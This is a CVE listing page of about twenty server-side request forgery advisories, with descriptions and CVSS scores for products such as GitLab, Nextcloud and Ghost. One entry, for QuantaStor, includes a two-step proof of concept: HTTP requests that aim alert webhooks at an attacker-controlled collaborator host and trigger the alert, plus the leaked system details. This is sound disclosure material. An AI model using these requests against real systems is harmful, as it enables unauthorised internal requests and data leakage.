Total
1850 CVE
| CVE | Vendors | Products | Updated | CVSS v2 | CVSS v3 |
|---|---|---|---|---|---|
| CVE-2025-58005 | 2025-09-22 | N/A | 5.4 MEDIUM | ||
| Server-Side Request Forgery (SSRF) vulnerability in SmartDataSoft DriCub allows Server Side Request Forgery. This issue affects DriCub: from n/a through 2.9. | |||||
| CVE-2025-58011 | 2025-09-22 | N/A | 6.4 MEDIUM | ||
| Server-Side Request Forgery (SSRF) vulnerability in Alex Content Mask allows Server Side Request Forgery. This issue affects Content Mask: from n/a through 1.8.5.2. | |||||
| CVE-2025-9960 | 2025-09-22 | N/A | N/A | ||
| A restriction bypass vulnerability in is-localhost-ip could allow attackers to perform Server-Side Request Forgery (SSRF). This issue affects is-localhost-ip: 2.0.0. | |||||
| CVE-2025-58962 | 2025-09-22 | N/A | 6.4 MEDIUM | ||
| Server-Side Request Forgery (SSRF) vulnerability in publitio Publitio allows Server Side Request Forgery. This issue affects Publitio: from n/a through 2.2.1. | |||||
| CVE-2021-42079 | 1 Osnexus | 1 Quantastor | 2025-09-22 | N/A | 6.2 MEDIUM |
| An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests. POC Step 1: Prepare the SSRF with a request like this: GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1 Host: <HOSTNAME> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Connection: close authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json Content-Length: 0 Step 2: Trigger this alert with this request GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1 Host: <HOSTNAME> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Connection: close authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json Content-Length: 1 The post request received by <TARGET> looks like this: { ### Python FLASK stuff #### 'endpoint': 'index', 'method': 'POST', 'cookies': ImmutableMultiDict([]), ### END Python FLASK stuff #### 'data': b'{ "attachments": [ { "fallback": "[122] test / test.", "color": "#aa2222", "title": "[122] test", "text": "test", "fields": [ { "title": "Alert Severity", "value": "CRITICAL", "short": false }, { "title": "Appliance", "value": "quantastor (https://<HOSTNAME>)", "short": true }, { "title": "System / Driver / Kernel Ver", "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic", "short": false }, { "title": "System Startup", "value": "Fri Aug 6 16-02-55 2021", "short": true }, { "title": "SSID", "value": "f4823762-1dd1-1333-47a0-6238c474a7e7", "short": true }, ], "footer": "QuantaStor Call-home Alert", "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ", "ts": 1628461774 } ], "mrkdwn":true }', #### FLASK REQUEST STUFF ##### 'headers': { 'Host': '<redacted>', 'User-Agent': 'curl/7.58.0', 'Accept': '*/*', 'Content-Type': 'application/json', 'Content-Length': '790' }, 'args': ImmutableMultiDict([]), 'form': ImmutableMultiDict([]), 'remote_addr': '217.103.63.173', 'path': '/payload/58', 'whois_ip': 'TNF-AS, NL' } #### END FLASK REQUEST STUFF ##### | |||||
| CVE-2024-38645 | 1 Qnap | 1 Notes Station 3 | 2025-09-20 | N/A | 6.5 MEDIUM |
| A server-side request forgery (SSRF) vulnerability has been reported to affect Notes Station 3. If exploited, the vulnerability could allow remote authenticated attackers to read application data. We have already fixed the vulnerability in the following version: Notes Station 3 3.9.7 and later | |||||
| CVE-2025-6454 | 1 Gitlab | 1 Gitlab | 2025-09-20 | N/A | 8.5 HIGH |
| An issue has been discovered in GitLab CE/EE affecting all versions from 16.11 before 18.1.6, 18.2 before 18.2.6, and 18.3 before 18.3.2 that could have allowed authenticated users to make unintended internal requests through proxy environments by injecting crafted sequences. | |||||
| CVE-2025-58045 | 1 Dataease | 1 Dataease | 2025-09-19 | N/A | 9.8 CRITICAL |
| Dataease is an open source data analytics and visualization platform. In Dataease versions up to 2.10.12, the patch introduced to mitigate DB2 JDBC deserialization remote code execution attacks only blacklisted the rmi parameter. The ldap parameter in the DB2 JDBC connection string was not filtered, allowing attackers to exploit the DB2 JDBC connection string to trigger server-side request forgery (SSRF). In higher versions of Java, ldap deserialization (autoDeserialize) is disabled by default, preventing remote code execution, but SSRF remains exploitable. Versions up to 2.10.12 are affected. The issue is fixed in version 2.10.13. Updating to 2.10.13 or later is recommended. No known workarounds are documented aside from upgrading. | |||||
| CVE-2025-47791 | 1 Nextcloud | 1 Nextcloud Server | 2025-09-19 | N/A | 4.3 MEDIUM |
| Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server prior to 28.0.13, 29.0.10, and 30.0.3 and Nextcloud Enterprise Server prior to 28.0.13, 29.0.10, and 30.0.3, a currently unused endpoint to verify a share recipient was not protected correctly, allowing to proxy requests to another server. The endpoint was removed in Nextcloud Server 28.0.13, 29.0.10, and 30.0.3 and Nextcloud Enterprise Server 28.0.13, 29.0.10, and 30.0.3. No known workarounds are available. | |||||
| CVE-2021-28627 | 1 Adobe | 1 Experience Manager | 2025-09-19 | 6.5 MEDIUM | 5.4 MEDIUM |
| Adobe Experience Manager Cloud Service offering, as well as versions 6.5.8.0 (and below) is affected by a Server-side Request Forgery. An authenticated attacker could leverage this vulnerability to contact systems blocked by the dispatcher. Exploitation of this issue does not require user interaction. | |||||
| CVE-2025-59346 | 1 Linuxfoundation | 1 Dragonfly | 2025-09-18 | N/A | 5.3 MEDIUM |
| Dragonfly is an open source P2P-based file distribution and image acceleration system. Versions prior to 2.1.0 contain a server-side request forgery (SSRF) vulnerability that enables users to force DragonFly2’s components to make requests to internal services that are otherwise not accessible to them. The issue arises because the Manager API accepts a user-supplied URL when creating a Preheat job with weak validation, peers can trigger other peers to fetch an arbitrary URL through pieceManager.DownloadSource, and internal HTTP clients follow redirects, allowing a request to a malicious server to be redirected to internal services. This can be used to probe or access internal HTTP endpoints. The vulnerability is fixed in version 2.1.0. | |||||
| CVE-2025-10410 | 1 Rems | 1 Link Status Checker | 2025-09-18 | 6.5 MEDIUM | 6.3 MEDIUM |
| A security vulnerability has been detected in SourceCodester Link Status Checker 1.0. This vulnerability affects unknown code of the file index.php. The manipulation of the argument proxy leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed publicly and may be used. | |||||
| CVE-2024-28435 | 1 Twenty | 1 Twenty | 2025-09-18 | N/A | 5.4 MEDIUM |
| The CRM platform Twenty version 0.3.0 is vulnerable to SSRF via file upload. | |||||
| CVE-2025-9862 | 2025-09-18 | N/A | N/A | ||
| Server-Side Request Forgery (SSRF) vulnerability in Ghost allows an attacker to access internal resources.This issue affects Ghost: from 6.0.0 through 6.0.8, from 5.99.0 through 5.130.3. | |||||
| CVE-2025-44594 | 1 Halo | 1 Halo | 2025-09-17 | N/A | 9.1 CRITICAL |
| halo v2.20.17 and before is vulnerable to server-side request forgery (SSRF) in /apis/uc.api.storage.halo.run/v1alpha1/attachments/-/upload-from-url. | |||||
| CVE-2025-10329 | 1 Unmark | 1 Unmark | 2025-09-16 | 6.5 MEDIUM | 6.3 MEDIUM |
| A vulnerability was detected in cdevroe unmark up to 1.9.3. This affects an unknown part of the file /application/controllers/Marks.php. The manipulation of the argument url results in server-side request forgery. The attack may be launched remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | |||||
| CVE-2025-59155 | 2025-09-16 | N/A | N/A | ||
| hackmd-mcp is a Model Context Protocol server for integrating HackMD's note-taking platform with AI assistants. From 1.4.0 to before 1.5.0, hackmd-mcp contains a server-side request forgery (SSRF) vulnerability when the server is run in HTTP transport mode. Arbitrary hackmdApiUrl values supplied via the Hackmd-Api-Url HTTP header or a base64-encoded JSON query parameter are accepted without validation, allowing attackers to redirect outbound API requests to internal network services, access internal endpoints, perform network reconnaissance, and bypass network access controls. The stdio transport mode is not affected because it only accepts stdio requests. The issue is fixed in version 1.5.0, which enforces allowed endpoints and supports the ALLOWED_HACKMD_API_URLS environment variable. Users should update to 1.5.0 or later or apply documented mitigations such as switching to stdio mode, restricting outbound network access, or filtering the Hackmd-Api-Url header and related query parameter via a reverse proxy. | |||||
| CVE-2025-59437 | 2025-09-16 | N/A | 3.2 LOW | ||
| The ip (aka node-ip) package through 2.0.1 (in NPM) might allow SSRF because the IP address value 0 is improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2024-29415. NOTE: in current versions of several applications, connection attempts to the IP address 0 (interpreted as 0.0.0.0) are blocked with error messages such as net::ERR_ADDRESS_INVALID. However, in some situations that depend on both application version and operating system, connection attempts to 0 and 0.0.0.0 are considered connection attempts to 127.0.0.1 (and, for this reason, a false value of isPublic would be preferable). | |||||
| CVE-2025-59436 | 2025-09-16 | N/A | 3.2 LOW | ||
| The ip (aka node-ip) package through 2.0.1 (in NPM) might allow SSRF because the IP address value 017700000001 is improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2024-29415. | |||||
| CVE-2025-7103 | 1 Boyuncms Project | 1 Boyuncms | 2025-09-15 | 6.5 MEDIUM | 6.3 MEDIUM |
| A vulnerability was found in BoyunCMS up to 1.4.20. It has been rated as critical. This issue affects some unknown processing of the file /application/pay/controller/Index.php of the component curl. The manipulation leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. | |||||